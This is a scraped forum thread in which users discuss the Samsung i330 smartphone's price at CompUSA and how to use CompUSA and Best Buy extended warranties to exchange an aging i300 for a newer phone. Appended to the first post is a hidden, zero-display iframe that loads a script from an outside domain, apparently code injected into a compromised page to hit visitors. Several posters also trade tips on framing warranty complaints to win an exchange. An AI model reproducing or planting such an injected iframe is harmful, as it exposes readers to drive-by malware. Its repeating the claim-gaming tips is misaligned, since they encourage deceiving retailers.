+ Reply to Thread

I330 info from CompUSA

The I330 is in the computer system at CompUSA for retail of $499 and a cost of around $310. Should see it in a couple weeks I presume. Almost time to use my extended warrenty at CompUSA.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

man, if i dont see the kyp 7135 show up at sprint soon, i just may grab the i330...

thanks for the heads up~!

I-300 Novice

CompUSA Warranty and Switching to 7135

A question for the warranty gurus...

I have a Comp USA warranty on my I-300 which I would like to 'use' to get a 7135 (when they ever come out).

Since Comp USA is carrying the I-300, will I be forced to get an I-300 when I want to use the warranty or will they let me 'convert' to the 7135?

Thanks in advance for your input.
    Ahmed V. Ismail
    A Smartphone Addict

The I330 is a completely different phone from the I300 as fas as CompUSA is concerned. Upon returning the I300 and CompUSA informing you they have no I300s in stock you will be issued a store credit.

The I300 is officially discountinued at CompUSA. You may want to make sure they do not have any leftover in stock though. Just ask a salesman to check in the computer before using the plan. Technically if they have a I300 in store, that would and should be the replacement. Now depending on the store, and the associate, they may have one in stock and let you "upgrade".

Anyone from the Best Buy camp hearing anything? I tested the waters last week even though the don't have any phones I want, yet. Basically told them my batteries both need replacement and that I constantly drop calls cause the signal strength at my house sucks.

The girl told me they could "order" batteries and that the call droppage was a Sprint issue.

Until they have the newer phones, I didn't argue...saving that for later.

The plastic tab that applies pressure on the stylus recently broke on my I300 subsequently resulting in two lost styli. I tested out my 3 year warranty at best buy and got interesting results. The service desk said they would replace it with whatever the comparable unit from Samsung was (good news!). I proceeded to the phone area of BB. The young sales person had no idea what a smart phone was. At the time the only phone they had that was close was the A500 for $299. He said he could set me up with the A500 AND a separate PDA! I told him I would wait.

Will update you on what happens with BB.

Hi, I'm a Service Technician at a Best Buy store in West Texas. If you want to be able to exchange your i300 for a i330 by using your 3 Year PSP, I suggest that you do not mention any battery problems. Batteries are covered by the PSP, but you order those from a hotline, that isn't something that Best Buy would exchange it over.
    The person who had a problem with their stylii falling out, that is a valid issue and should definately be taken care of by the Service Department (a la exchange). Essentially you need an issue that can be verified as such by a Service Technician before you are going to be hooked up.
    I used to own a i300, so I certainly feel for you guys. Good luck.
    :. Trent Lott

I330 at Comp USA

I just got off the phone with Comp USA and St. Louis does not have any of the I300s in any of their stores. But the I330 is listed in their computers for $499. The customer rep did not have an availabilty date.

Sincere Issues with I300

Dunno if anyone besides me is having legitimate issues with the i300 but Ihave had to have mine replaced by Sprint 3 times and now the d@mn thing is dialing numbers that are actually god knows what when I dial from my address book. Not to mention, it occasionally requires a hard reset and thereby resync. And all Sprint can doe is tell me that I can upgrade to a Kyocera 6036(yes the old monchrome one) or get replaced with yet another i300. I should have bought from BestBuy instead of Sprint directly so I could now try out the Treo. Any ideas? I am tired of being stuck with a blank i300 after a hard reset when on the road. Not to mention, calling my family and random person answers....

HELP!!!!

Question: Why wouldn't they(Best Buy) just buy the stylus from Samsung instead of giving credit for the phone?

That would seem to be a smaller problem than the battery.........Don't get me wrong......I plan to make use of upgrade policy, too!!!!

I spoke with BB rep over phone and he said say batteries don't hold charge and that will work......is this just a luck-of-the-rep. type of thing?

Re-read the post(reading is fundamental) they were talking about the plastic piece on the case holding the stylus.....oh!

if the problem needs to be verifiable by rep. and your stylus holder still works, and battery failure won't work....what will?

Like I said above, the Battery *is* covered by the Service Plan, but it is not something that Best Buy would exchange your phone over. The representative that you spoke to was (most likely) not a Service Technician, and they will be the ones who have the final say as to whether or not you will be able to exchange your phone.
    :. Trent Lott

I300 back to CompUSA

I just returned my I300 to CompUSA under a 2 yr replacement warranty -- screen too dim to see anymore

Since the I300 is discontinued and they couldn't get any, they gave me a brand new Handspring Treo 300 which I promptly sold for $300 cash

I got my I300 the first week CompUSA had them for $500 less a $100 gift card which they gave me for the purchase.

SO, I had the use of an I300 for 14 months for $100..about $7.15 month--not to bad !!

:p :p :p :p